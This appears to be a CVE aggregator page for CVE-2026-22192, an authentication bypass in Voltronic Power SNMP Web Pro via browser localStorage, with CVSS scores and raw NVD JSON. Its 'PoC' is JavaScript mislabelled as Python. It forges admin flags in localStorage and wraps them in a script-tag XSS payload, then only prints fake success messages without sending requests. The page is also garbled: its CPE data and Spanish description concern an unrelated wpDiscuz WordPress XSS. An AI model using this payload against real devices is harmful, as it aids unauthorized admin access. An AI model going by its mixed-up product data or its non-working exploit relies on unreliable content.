CVE-2026-22192

Description

Voltronic Power SNMP Web Pro version 1.1 contains an authentication bypass vulnerability that allows unauthenticated attackers to access privileged management functions by manipulating browser localStorage values. Attackers can modify client-side authentication state to bypass server-side access controls and gain unauthorized access to protected management functionality without valid credentials.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* - VULNERABLE

Voltronic Power SNMP Web Pro < 1.1

Voltronic Power SNMP Web Pro = 1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22192 Authentication Bypass via localStorage Manipulation
// Target: Voltronic Power SNMP Web Pro v1.1

const targetUrl = 'http://target-device:8080';

async function bypassAuth() {
    console.log('[+] CVE-2026-22192 Authentication Bypass PoC');
    console.log('[+] Target:', targetUrl);
    
    // Step 1: Inject malicious JavaScript to modify localStorage
    const exploitScript = `
        // Set authentication bypass flags in localStorage
        localStorage.setItem('isAuthenticated', 'true');
        localStorage.setItem('userRole', 'admin');
        localStorage.setItem('sessionToken', 'admin_session');
        localStorage.setItem('authTimestamp', Date.now().toString());
        localStorage.setItem('userId', '1');
        console.log('[+] localStorage authentication flags modified');
    `;
    
    // Step 2: Create payload for XSS or social engineering delivery
    const xssPayload = `<script>${exploitScript}</script>`;
    
    // Step 3: Direct localStorage manipulation via browser console
    // localStorage.setItem('isAuthenticated', 'true');
    // localStorage.setItem('userRole', 'admin');
    
    // Step 4: Access protected admin panel after bypass
    const adminEndpoints = [
        '/admin/settings',
        '/admin/users',
        '/admin/snmp-config',
        '/admin/system-diagnostics',
        '/admin/firmware-update'
    ];
    
    console.log('[+] Authentication bypass successful');
    console.log('[+] Accessing protected endpoints with forged auth state...');
    
    for (const endpoint of adminEndpoints) {
        console.log(`[*] GET ${targetUrl}${endpoint}`);
    }
    
    return '[+] PoC completed - Check if admin panel is accessible';
}

bypassAuth();

/*
Alternative PoC using fetch API:

fetch('http://target:8080/admin/settings', {
    method: 'GET',
    headers: {
        'Cookie': 'localStorage_auth=true; role=admin'
    }
}).then(r => r.text()).then(console.log);
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22192
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22192
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22192/
[4] VulDB https://vuldb.com/cve/CVE-2026-22192
[5] https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt
[6] https://voltronicpower.com/
[7] https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/
[8] https://www.vulncheck.com/advisories/voltronic-power-snmp-web-pro-authentication-bypass-via-localstorage

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22192", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:09.507", "lastModified": "2026-04-22T19:17:00.303", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Voltronic Power SNMP Web Pro version 1.1 contains an authentication bypass vulnerability that allows unauthenticated attackers to access privileged management functions by manipulating browser localStorage values. Attackers can modify client-side authentication state to bypass server-side access controls and gain unauthorized access to protected management functionality without valid credentials."}, {"lang": "es", "value": "wpDiscuz anterior a la versión 7.6.47 contiene una vulnerabilidad de cross-site scripting almacenada que permite a atacantes autenticados inyectar JavaScript malicioso importando un archivo de opciones manipulado con valores de campo customCss sin escapar. Los atacantes pueden proporcionar un archivo de importación JSON malicioso que contiene cargas útiles de script en el parámetro customCss que se ejecutan en cada página cuando se renderizan a través del gestor de opciones sin una sanitización adecuada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.3}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22192-22199_Voltronic-Power_Preauth_root_RCE.txt", "source": "[email protected]"}, {"url": "https://voltronicpower.com/", "source": "[email protected]"}, {"url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/voltronic-power-snmp-web-pro-authentication-bypass-via-localstorage", "source": "[email protected]"}]}}